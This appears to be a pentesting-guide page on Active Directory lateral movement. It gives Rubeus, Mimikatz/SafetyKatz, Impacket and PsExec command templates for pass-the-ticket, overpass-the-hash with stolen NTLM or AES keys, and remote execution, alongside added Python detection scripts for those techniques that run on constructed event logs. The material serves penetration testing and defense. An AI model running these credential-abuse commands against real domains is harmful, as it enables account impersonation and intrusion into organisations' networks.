# Lateral Movement

## Introduction

In this section, you will find some techniques to perform lateral movement on **Active Directory** infrastructure.

## Pass The Ticket (PTT)

In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. The attacker can then use this TGT to request additional service tickets without the need for any further authentication.

You can perform this technique with **Rubeus**.

```bash
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>
```

Depending on the obtained TGS, you will only be able to perform specific tasks.
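From the defender's side, a ticket that was stolen on one host and imported on another leaves a characteristic trace on the domain controller: the TGT was issued (event 4768) to the original client's address, while the service-ticket requests (event 4769) for the same account arrive from an address that never received a TGT for it. The following is an added detection example, not code from the original page, and runs over a constructed set of flattened 4768/4769 records; field names follow the Windows Security log, the host names and addresses are made up.

```python
"""Pass-the-Ticket triage on DC Kerberos logs.

A successful 4768 (TGT issued) records the client address that requested it.
A successful 4769 (service ticket issued) for the same account from an
address with no matching 4768 points to a TGT that was imported rather
than requested there. Added example with constructed records, not from the
original page.
"""
from collections import defaultdict

# Constructed sample records (not real logs). 4769 reports the account in
# UPN form and the DC often logs IPv4-mapped IPv6 addresses (::ffff:a.b.c.d).
SAMPLE_KERB = [
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.21", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "cifs/fs01.corp.local",
     "IpAddress": "::ffff:10.0.0.21", "Status": "0x0"},
    # same account, same service, but from a host that never obtained a TGT for it
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "cifs/fs01.corp.local",
     "IpAddress": "::ffff:10.0.0.77", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "ldap/dc01.corp.local",
     "IpAddress": "::ffff:10.0.0.77", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "10.0.0.30", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "HOST/ws05.corp.local",
     "IpAddress": "10.0.0.30", "Status": "0x0"},
    # failed request: ignored, it never produced a usable ticket
    {"EventID": 4769, "TargetUserName": "carol@CORP.LOCAL", "ServiceName": "cifs/fs01.corp.local",
     "IpAddress": "10.0.0.77", "Status": "0x1b"},
]


def normalise_ip(addr):
    """Strip the IPv4-mapped IPv6 prefix so 4768 and 4769 addresses compare equal."""
    return addr[7:] if addr.startswith("::ffff:") else addr


def normalise_user(name):
    """4768 logs 'alice', 4769 logs 'alice@REALM'; compare on the bare account name."""
    return name.split("@", 1)[0].lower()


def tgt_origins(events):
    """Map each account to the client addresses that successfully obtained a TGT for it."""
    origins = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == "0x0":
            origins[normalise_user(e["TargetUserName"])].add(normalise_ip(e["IpAddress"]))
    return dict(origins)


def orphan_tgs_requests(events):
    """Return (user, ip, service) for successful 4769s whose source address never got a TGT for that user."""
    origins = tgt_origins(events)
    hits = []
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        user = normalise_user(e["TargetUserName"])
        ip = normalise_ip(e["IpAddress"])
        if ip not in origins.get(user, set()):
            hits.append((user, ip, e["ServiceName"]))
    return hits


if __name__ == "__main__":
    for user, ip, svc in orphan_tgs_requests(SAMPLE_KERB):
        print(f"possible imported ticket: {user} requested {svc} from {ip} without a TGT issued there")
```

The log window has to cover at least the TGT lifetime (ten hours by default), otherwise a legitimately cached ticket looks orphaned; VPN or NAT address changes and requests handled by a different DC than the one being queried produce the same false positive, so the rule is a triage filter, not a verdict.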

### Tickets - Techniques

| Service Type                               | Required Tickets                                          |
| ------------------------------------------ | --------------------------------------------------------- |
| Windows File Share (PsExec)                | CIFS                                                      |
| LDAP Operations (DCSync)                   | LDAP                                                      |
| WinRM                                      | <p>HOST<br>HTTP<br>WINRM</p>                              |
| WMI                                        | <p>HOST<br>RPCSS</p>                                      |
| PowerShell Remoting                        | <p>HOST<br>HTTP<br>Depending on OS:<br>WSMAN<br>RPCSS</p> |
| Scheduled Tasks                            | HOST                                                      |
| Windows Remote Server Administration Tools | <p>RPCSS<br>LDAP<br>CIFS</p>                              |
| Golden Tickets                             | krbtgt                                                    |

## Overpass The Hash (OTH)

This technique allows a user to request a Kerberos TGT using the account's NTLM hash or its AES/RC4 key instead of its password.

* **Alternative 1 - Without HIGH privileges**

```bash
# Rubeus
.\Rubeus.exe asktgt /nowrap /user:<USER> [/dc:<DC_IP>] [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] [/opsec|/force] /ptt
# Impacket
impacket-getTGT <DOMAIN>/<USERNAME>[:password] -dc-ip <DC_IP> -hashes LMHASH:NTHASH
```

* **Alternative 2 - Requires HIGH privileges**

```bash
[.\Mimikatz.exe | .\SafetyKatz.exe ] "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /run:[cmd.exe | powershell.exe]" "exit"
```
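When the key supplied is the NT hash, the only Kerberos encryption type that key can serve is RC4-HMAC, so the resulting AS-REQ is logged on the DC as a 4768 with ticket encryption type 0x17 even in domains where the account normally gets AES (0x12) tickets. The following is an added detection example, not code from the original page, that applies this rule to a constructed set of flattened 4768 records; account names and addresses are made up.

```python
"""Flag RC4 (etype 0x17) TGT requests for accounts that otherwise use AES.

Overpass-the-hash with an NT hash forces the AS-REQ to RC4-HMAC because the
NT hash is the RC4 key. Added example with constructed 4768 records, not
part of the original page.
"""
from collections import defaultdict

RC4_HMAC = "0x17"
AES_ETYPES = {"0x11", "0x12"}  # AES128-CTS-HMAC-SHA1-96, AES256-CTS-HMAC-SHA1-96

# Constructed sample (not real logs): the 4768 fields that matter here.
SAMPLE_4768 = [
    {"TargetUserName": "alice", "IpAddress": "10.0.0.21", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"TargetUserName": "alice", "IpAddress": "10.0.0.21", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # alice suddenly requests an RC4 TGT from a different host
    {"TargetUserName": "alice", "IpAddress": "10.0.0.77", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "bob", "IpAddress": "10.0.0.30", "TicketEncryptionType": "0x12", "Status": "0x0"},
    # legacy service account that has always used RC4: noise to baseline, not a downgrade
    {"TargetUserName": "legacy-svc", "IpAddress": "10.0.0.9", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"TargetUserName": "legacy-svc", "IpAddress": "10.0.0.9", "TicketEncryptionType": "0x17", "Status": "0x0"},
    # failed pre-authentication (0x18): no ticket was issued, so it is not a downgrade
    {"TargetUserName": "carol", "IpAddress": "10.0.0.77", "TicketEncryptionType": "0x17", "Status": "0x18"},
]


def etype_profile(events):
    """Map each account to the set of encryption types it has successfully obtained TGTs with."""
    profile = defaultdict(set)
    for e in events:
        if e["Status"] == "0x0":
            profile[e["TargetUserName"]].add(e["TicketEncryptionType"])
    return dict(profile)


def flag_rc4_downgrades(events):
    """Return (downgrades, rc4_only_accounts).

    downgrades: (user, ip) for successful RC4 TGTs issued to accounts that also use AES.
    rc4_only_accounts: accounts that never used AES in this window; review their
    msDS-SupportedEncryptionTypes rather than alerting on every request.
    """
    profile = etype_profile(events)
    downgrades, rc4_only = [], set()
    for e in events:
        if e["Status"] != "0x0" or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        user = e["TargetUserName"]
        if profile[user] & AES_ETYPES:
            downgrades.append((user, e["IpAddress"]))
        else:
            rc4_only.add(user)
    return downgrades, sorted(rc4_only)


if __name__ == "__main__":
    downgrades, rc4_only = flag_rc4_downgrades(SAMPLE_4768)
    for user, ip in downgrades:
        print(f"RC4 TGT for AES-capable account {user} from {ip}: possible overpass-the-hash")
    print("RC4-only accounts to baseline:", rc4_only)
```

The rule is blind to the `/aes256` and `/aes128` variants, which produce an ordinary 0x12 or 0x11 request, so pair it with the source-address check from the Pass-the-Ticket section and with host telemetry for LSASS access on the requesting machine.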

Then you can use PsExec to access the machine, provided the user has local administrator privileges on it.

> :information_source: The `-s` argument runs the remote process as "nt authority\system", but it only works if you connect as a highly privileged user.

```bash
# Alternative 1
.\PsExec.exe /accepteula [-s] \\<COMPUTER_NAME> <PROGRAM>
# Alternative 2
export KRB5CCNAME=<PATH_TICKET.ccache>
impacket-psexec -k -no-pass [[domain/]username@]<COMPUTER_NAME> -dc-ip <DC_IP> [-c <PROGRAM.EXE>]
```
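Sysinternals PsExec is noisy on the target: it copies `PSEXESVC.exe` into the `ADMIN$` share over SMB (Security event 5145, share object accessed) and then registers a service named `PSEXESVC` (System event 7045, service installed). The following is an added detection example, not code from the original page, that correlates those two stages per host over a constructed set of flattened records; host names, accounts and addresses are made up.

```python
"""Correlate the two host-side stages of a Sysinternals PsExec session.

Stage 1: Security 5145, a write of PSEXESVC.exe into ADMIN$ from the operator's host.
Stage 2: System 7045, installation of the PSEXESVC service pointing at that binary.
Added example with constructed records, not part of the original page.
"""
from collections import defaultdict

PSEXEC_MARKER = "PSEXESVC"

# Constructed sample (not real logs), flattened to the fields used below.
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 5145, "Computer": "FS01", "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "PSEXESVC.exe", "SubjectUserName": "alice", "IpAddress": "10.0.0.77"},
    {"Channel": "System", "EventID": 7045, "Computer": "FS01", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"},
    # benign service installation by a deployment agent
    {"Channel": "System", "EventID": 7045, "Computer": "WS05", "ServiceName": "BackupAgent",
     "ImagePath": "C:\\Program Files\\Backup\\agent.exe", "AccountName": "LocalSystem"},
    # benign ADMIN$ use by patch management
    {"Channel": "Security", "EventID": 5145, "Computer": "WS05", "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "Temp\\patch.msi", "SubjectUserName": "svc-sccm", "IpAddress": "10.0.0.5"},
    # binary staged but no service registered yet (copy blocked, or still in progress)
    {"Channel": "Security", "EventID": 5145, "Computer": "WS09", "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "PSEXESVC.exe", "SubjectUserName": "alice", "IpAddress": "10.0.0.77"},
]


def psexec_indicators(events):
    """Return one indicator dict per event that matches a PsExec stage."""
    hits = []
    for e in events:
        if e["EventID"] == 7045 and (
            e["ServiceName"].upper() == PSEXEC_MARKER or PSEXEC_MARKER in e["ImagePath"].upper()
        ):
            hits.append({"host": e["Computer"], "stage": "service_installed", "detail": e["ImagePath"]})
        elif (
            e["EventID"] == 5145
            and e["ShareName"].upper().endswith("ADMIN$")
            and PSEXEC_MARKER in e["RelativeTargetName"].upper()
        ):
            hits.append({"host": e["Computer"], "stage": "binary_staged",
                         "detail": f'{e["SubjectUserName"]}@{e["IpAddress"]}'})
    return hits


def stages_by_host(events):
    """Group matched stages per target host."""
    by_host = defaultdict(set)
    for h in psexec_indicators(events):
        by_host[h["host"]].add(h["stage"])
    return dict(by_host)


def confirmed_hosts(events):
    """Hosts where both the binary drop and the service install were seen."""
    required = {"binary_staged", "service_installed"}
    return sorted(host for host, stages in stages_by_host(events).items() if required <= stages)


if __name__ == "__main__":
    for host, stages in stages_by_host(SAMPLE_EVENTS).items():
        verdict = "confirmed" if host in confirmed_hosts(SAMPLE_EVENTS) else "partial"
        print(f"{host}: {sorted(stages)} -> {verdict} PsExec activity")
```

The name match is the cheap first pass: PsExec's `-r` option renames the service, and Impacket's `psexec` uses a randomised service and binary name, so the more durable rule is any 7045 whose image path sits directly under the system root and that follows, within seconds, an `ADMIN$` write of the same file name from a remote address.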

## S4U2Self Abuse (Constrained Delegation)

The exploitation is seen on the [Kerberos exploitation phase](https://the-pentesting-guide.marmeus.com/active-directory/kerberos#s4u2self-abuse).

## Alternate Service Name (Constrained Delegation)

The exploitation is seen on the [Kerberos exploitation phase](https://the-pentesting-guide.marmeus.com/active-directory/kerberos#alternate-service-name).

